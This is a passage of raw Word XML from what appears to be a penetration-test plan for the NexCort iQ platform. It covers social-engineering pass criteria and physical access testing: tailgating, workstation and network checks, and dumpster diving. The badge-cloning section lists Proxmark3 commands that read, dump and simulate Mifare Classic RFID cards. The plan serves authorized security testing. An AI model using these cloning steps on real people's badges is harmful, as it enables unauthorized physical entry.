        <w:spacing w:after="60" w:before="60"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="7C3AED"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">• </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="1A1A2E"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Is there a code word or out-of-band verification process for executive wire transfer requests?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="120" w:before="280"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="2D2A40"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">Pass Criteria</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="60"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="7C3AED"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">• </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="1A1A2E"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Less than 10% of employees click phishing links</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="60"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="7C3AED"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">• </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="1A1A2E"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Zero credential submissions on phishing landing pages</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="60"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="7C3AED"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">• </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="1A1A2E"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">All vishing attempts escalated to security team before any action taken</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="60"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="7C3AED"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">• </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="1A1A2E"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">MFA reset requires identity verification through a second channel</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="60"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="7C3AED"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">• </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="1A1A2E"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">No unauthorized user accounts created as a result of social engineering</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:pBdr>
          <w:bottom w:val="single" w:color="7C3AED" w:sz="4" w:space="6"/>
        </w:pBdr>
        <w:spacing w:after="160" w:before="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="7C3AED"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve">Phase 5 — Physical Access Testing</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:before="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="1A1A2E"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Physical access testing examines whether an attacker could gain physical access to hardware, workstations, or networks used by NexCort iQ. For a cloud-native platform, the physical attack surface centers on developer workstations and any shared office environments, rather than server hardware.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr>
          <w:left w:val="thick" w:color="7C3AED" w:sz="8"/>
        </w:pBdr>
        <w:shd w:fill="F5F3FF" w:val="clear"/>
        <w:spacing w:after="120" w:before="120"/>
        <w:ind w:left="200" w:right="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="7C3AED"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">NOTE: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="1A1A2E"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">AWS manages physical security of its data centers under SOC 2 Type II, ISO 27001, and FedRAMP certifications. Physical testing for NexCort iQ does not include AWS data centers.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="120" w:before="280"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="2D2A40"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">In-Scope Physical Targets</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="60"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="7C3AED"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">• </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="1A1A2E"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">NexCort iQ developer workstations with production AWS access</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="60"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="7C3AED"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">• </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="1A1A2E"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Office environments where Cognito admin credentials are used</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="60"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="7C3AED"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">• </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="1A1A2E"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Any shared workspace or co-working space used by RC engineers</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="60"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="7C3AED"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">• </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="1A1A2E"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Agency customer premises where dispatchers use the platform (with agency consent)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="120" w:before="280"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="2D2A40"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">Test Techniques</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:after="80" w:before="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="3D3A50"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">1. Tailgating</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:before="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="1A1A2E"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Follow an authorized employee through a secured entrance without using your own access credentials.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="60"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="7C3AED"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">• </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="1A1A2E"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Test: Does any RC employee challenge an unknown person who enters behind them?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="60"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="7C3AED"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">• </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="1A1A2E"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Test: Are there mantraps or single-person turnstiles at office entry points?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:after="80" w:before="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="3D3A50"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">2. Badge Cloning</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:before="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="1A1A2E"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Use an RFID reader to capture proximity card credentials from RC employees.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F0EFF8" w:val="clear"/>
        <w:spacing w:after="60" w:before="60"/>
        <w:ind w:left="360" w:right="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="2D1B69"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"># Proxmark3 — RFID analysis and cloning tool</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F0EFF8" w:val="clear"/>
        <w:spacing w:after="60" w:before="60"/>
        <w:ind w:left="360" w:right="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="2D1B69"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">pm3 --&gt; hf search          # scan for nearby HF RFID cards</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F0EFF8" w:val="clear"/>
        <w:spacing w:after="60" w:before="60"/>
        <w:ind w:left="360" w:right="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="2D1B69"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">pm3 --&gt; hf mf chk          # check for default Mifare Classic keys</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F0EFF8" w:val="clear"/>
        <w:spacing w:after="60" w:before="60"/>
        <w:ind w:left="360" w:right="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="2D1B69"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">pm3 --&gt; hf mf dump         # dump card contents if keys found</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F0EFF8" w:val="clear"/>
        <w:spacing w:after="60" w:before="60"/>
        <w:ind w:left="360" w:right="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="2D1B69"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">pm3 --&gt; hf mf sim          # simulate cloned card</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:after="80" w:before="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="3D3A50"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">3. Workstation Security</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="60"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="7C3AED"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">• </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="1A1A2E"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Is every workstation locked when the engineer steps away (idle timeout ≤ 5 minutes)?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="60"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="7C3AED"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">• </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="1A1A2E"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Can a physical attacker access a logged-in browser with AWS console active?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="60"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="7C3AED"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">• </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="1A1A2E"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Are credentials stored in unencrypted files on the desktop or downloads folder?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="60"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="7C3AED"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">• </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="1A1A2E"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Is Full Disk Encryption (FileVault / BitLocker) enforced on all devices?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="60"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="7C3AED"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">• </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="1A1A2E"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Can USB devices be connected to workstations?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:after="80" w:before="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="3D3A50"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">4. Network Access Points</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="60"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="7C3AED"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">• </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="1A1A2E"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Are ethernet ports in common areas active without network access control?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="60"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="7C3AED"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">• </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="1A1A2E"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Is the office WiFi password posted publicly?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="60"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="7C3AED"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">• </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="1A1A2E"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Can a connected device on the guest network reach any internal RC resources?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:after="80" w:before="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="3D3A50"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">5. Dumpster Diving</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="60"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="7C3AED"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">• </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="1A1A2E"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Are printed documents with configuration details, credentials, or agency data shredded?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="60"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="7C3AED"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">• </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="1A1A2E"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Are decommissioned devices wiped before disposal?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
